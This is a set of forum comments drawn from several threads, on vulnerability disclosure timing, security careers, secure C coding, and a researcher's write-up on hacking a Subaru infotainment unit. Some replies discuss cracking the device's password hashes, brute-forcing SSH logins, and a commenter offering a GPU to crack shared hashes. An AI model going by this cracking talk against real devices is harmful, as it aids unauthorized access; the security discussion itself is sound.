In total it was about 45 days or so from the initial conversation. I waited for a patched version to be released, because the next important milestone after that would be finished backports to older versions still in use, which is clearly going to take a long time as it is not being prioritized, so I wanted to inform users.
Initially I had said 90 days from the initial report, but it seemed like they were expanding the work to fill that time. I asked a number of times for them to make a security advisory and got no answer. Some discussions on the repo showed they were considering this as a theoretical issue. Now it's CVE-2024-51774, which got assigned within 48 hours of disclosing.
Any proof that actually happened or you just wearing a tin foil hat? Crypto enforcement en masse matter, intercepting highly specific targets using BitTorrent does not.
Honestly I think full disclosure with a courtesy heads-up to the project maintainers/company is the most ethical strategy for everyone involved. “I found a thing. I will disclose it on Monday. No hard feelings.” With ridiculous 45-90 day windows it’s the users that take on most all the risk, and in many ways that’s just as if not more unethical than some script kids catching wind before a patch is out. Every deployment of software is different and downstream consumers should be able to make an immediate call as to how to handle vulns that pop up.
Strongly disagree. 45 days to allow the authors to fix a bug that has been present for over a decade is not really much added risk for users. In this case, 45 days is about 1% additional time for the bug to be around. Maybe someone was exploiting it, but this extra time risk is a drop in the bucket, whereas releasing the bug immediately puts all users at high risk until a patch can be developed/released, and users update their software.
Maybe immediate disclosure would cause a few users to change their behavior, but no one is tracking security disclosures on all the software they use and changing their behavior based on them.
The caveat here is in case you have evidence of active exploitation, then immediate disclosure makes sense.
What if we changed the fundamental equation of the game: no more "responsible" disclosures, or define responsible as immediate and as widely published as possible (ideally with PoC). If anything, embargoes and timelines are irresponsible as they create unacceptable information asymmetry. An embargo is also an opportunity to back-room sell the facts of the embargo to the NSA or other national security apparatus on the downlow. An embargoed vulnerability will likely have a premium valuation model following something which rhymes with Black Scholes. Really, really think about it...
Warning shots across the bow in private are the polite and responsible way, but malicious actors don't typically extend such courtesies to their victims.
As such, compared to the alternative (bad actors having even more time to leverage and amplify the information asymmetry), a timely public disclosure is preferable, even with some unfortunate and unavoidable fallout. Typically security researchers are reasonable and want to do the right thing with regard to responsible disclosure.
On average, the "bigger party" inherently has more resources to respond compared to the reporter. This remains true even in open source software.
This is a pretty dangerous take. The reality is that the vast majority of security vulnerabilities in software are not actively exploited, beause no one knows about them. Unless you have proof of active exploitation, you are much more likely to hurt users by publicly disclosing a 0-day than by responsibly disclosing it to the developer and giving them a reasonable amount of time to come out with a patch. Even if the developers are acting badly. Making a vulnerability public is putting a target on every user, not on the developer.
Your take is the dangerous one. I don’t disagree that
> the vast majority of security vulnerabilities in software are not actively exploited
However I’d say your explanation that it’s
> because no one knows about them
is not necessarily the reason why.
If the vendor or developer isn’t fixing things, going public is the correct option. (I agree some lead time / attempt at coordinated disclosure is preferable here.)
> (I agree some lead time / attempt at coordinated disclosure is preferable here.)
Then I think we are in agreement overall. I took your initial comment to mean that as soon as you discover a vulnerability, you should make it public. If we agree that the process should always be to disclose it to the project, wait some amount of time, and only then make it public - then I think we are actually on the exact same page.
Now, for the specific amount of time: ideally, you'd wait until the project has a patch available, if they are collaborating and prioritizing things appropriately. However, if they are dragging their feet and/or not even acknowledging that a fix is needed, then I also agree that you should set a fixed time as a last ditch attempt to get them to fix it (say, "2 weeks from today"), and then make it public as a 0-day.
Indeed, we’re in agreement. Though I’d suggest a fixed disclosure timeframe at time of reporting. Maybe with an option to extend in cases where the fix is more complex than anticipated.
My point is: if you found a vulnerability and know that it is actively being exploited (say, you find out through contacts, or see it on your own systems, or whatever), then I would agree that it is ethical to publicize it immediately, maybe without even giving the creators prior notice: the vulnerability is already known by at least some bad actors, and users should be made aware immediately and take action.
However, if you don't know that it is being actively exploited, then the right course of action is to disclose it secretly to the creators, and work with them to coordinate on a timely patch before any public disclosure. Exactly how timely will depend on yours and their judgement of many factors. Even if the team is showing very bad judgement from your point of view, and acting dismissively; even if you have a history with them of doing this - you still owe it to the users of the code to at least try, and to at least give some unilateral but reasonable timeline in which you will disclose.
Even if you don't want to do this free work, the alternative is not to publicly disclose: it's to do nothing. In general, the users are still safer with an unknown vulnerability than they are with a known one that the developers aren't fixing. You don't have any responsibility to waste your own time to try to work with disagreeable people, but you also don't have the right to put users at risk just because you found an issue.
It’s unethical to users who are at risk to withhold critical information.
If McDonalds had an e-coli outbreak and a keen doctor picked up on it you wouldn't withhold that information from the public while McD developed a nice pr-strategy and quietly waited for the storm to pass, would you?
Why is security, which seriously is a public safety issue, any different?
And some may already be taking advantage. This is a perfect example where users are empowered to self mitigate. You’re relatively okay on private networks but definitely not on public networks. If I know when the bad actors know then I can e.g. not run qbittorrent at a coffee shop until it’s patched.
What about a pre-digital bank? If you came across knowledge of a security issue potentially allowing anyone to steal stuff from their vault, would you release that information to the public? Would everyone knowing how to break in make everyone's valuables safer?
Medicine and biosafety are PvE. Cybersecurity is PvP.
It looks like you made the best of a frustrating situation and, at the very least, have an excellent piece for your portfolio.
With the rise in number of new security engineers all competing for few "security research" jobs (security research/hacking is the "I want to be a game developer" of security), you start getting into these convoluted hiring processes. Unlike standard software engineering, there aren't even remotely enough positions to accommodate everyone, so the bar can get absurdly high.
Honestly, if the team is asking CTF questions, they clearly want hires with previous CTF experience and should just do targeted hiring from the top teams at different conferences.
At least send people a free t-shirt if they complete the challenge.
> With the rise in number of new security engineers every year all competing for few "security research" jobs (security research/hacking is the "I want to be a game developer" of security)
I’ll believe it, curious what other options there are for all those other new “security engineers”. Compliance work?
If you're new, it's the same advice as any other field. Find a way to stand out. Build a portfolio, have great grades, come from a good university program, ping contacts from your alumni network, do bug bounties, find and fix issues in open-source, etc.
I took Seacord's virtual class (CMU SEI? Can't remember) on Secure C coding a few years back and own, love, and regularly use the The CERT C Secure Coding Standard.
I learned from K&R, but highly recommend Seacord's books if you're looking for how to write secure C and a more modern take on some of the trickier parts of C.
Thanks! NCC Group is reselling the online Secure Coding Training and we also deliver instructor-led courses, although these might need to be delivered by webinar until the current crisis abates https://www.nccgroup.trust/us/our-services/cyber-security/se...
Ah I see, missed that the first time around. Another thing I’m wondering after processing this: did you ever try to ssh as the dm or daemon user after seeing the passwd file originally in ifs-subaru-gen3.raw?
P.S. Thank you for writing this! It’s super interesting snd very easy to follow. I’ve shared it with friends both for the content and also as an example of excellent technical writing.
Thanks! I wish there was a service I could pay for where I could ask lawyers vague security-research related questions like this. Right now I wouldn't even know where to begin looking for a lawyer that would be an authority on this type of stuff. If I found that person, I'm also not sure I could afford their time.
I agree, but I don't have a consulting-firm/reputation/team of lawyers etc. to hide behind. Reporting flaws to companies related to embedded is often still scary today.
The point of this is that hey, this isn't actually that hard if you're willing to put in the time. If you're moderately talented, you can probably learn it too!
As opposed to the standard exploit write-up/security conference circuit thing, where a lot of the details are kept secret and it seems like the entire point is to make other people think you're cool instead of teaching something. :)
Getting things patched is awful. A reasonably simple thing I'd like is to secure myself against meddling by Subaru. That includes updates I don't agree with and tracking of my vehicle.
Disabling the network connection would pretty much stop the tracking. Alternately, disabling GPS would work. Anybody worried about both stored data and about cellular companies reporting tower locations would need to disable both.
Undesired updates can mostly be stopped by disabling the network connection. Dealer service could be trouble; they might do an update without asking for my permission. Scrambling the crypto keys would probably stop the dealer service people from making updates.
Some of the above would also be needed to keep Subaru from uploading camera data taken in my garage. As it is now, Subaru could be watching me in my house!
1. I believe Harman had a previous device hacked back around 2014 due to a weak shadow hash. My guess was that they learned their lesson and made the password more complex. An easy way to test would be to diff the latest shadow file in the updated Subaru images (assuming they exist) -- if it changed, you may be right, if not, I'd still wager it is strong enough.
I don't like the idea of a backdoor like that available, but it is what it is.
2. The QNX6 hashing mechanism, to the best of my knowledge, isn't fully understood. Upstream changes to JTR seem to indicate that it has some form of bug in it or isn't fully reverse-engineered. That, along with having to spend presumably a large amount of time learning about contributing to hashcat & gpu programming, made this seem like a potential dead end without massive time investment.
So, is it possible it is crackable? Almost certainly, but I'm one guy doing this and you have to spend your time carefully in these ventures.
Thanks for thr reply! That all makes sense. With the Mazda, I don't think anyone bothered to try to go as far as you did with the software because it was so easy to get wifi turned on, connect, and then let your device try short password after password (and at just three lowercase letters, the result came fast).
Given the reet of the work and your first point, it does seem like yours is the smart choice in this case. I was just surprised you didn't tey bruteforcing via ssh at first.
Thanks for the awesome article by the way! My Mazda got totalled last month, and I got a new 2019 Honda Fit I haven't gotten around to messing with yet. This gives some great ideas for how to proceed.
I have a 2080Ti at home I can throw at it for a few days, if you're willing to share the hashes with me? I'm the same username on reddit if you're interested in DM-ing me.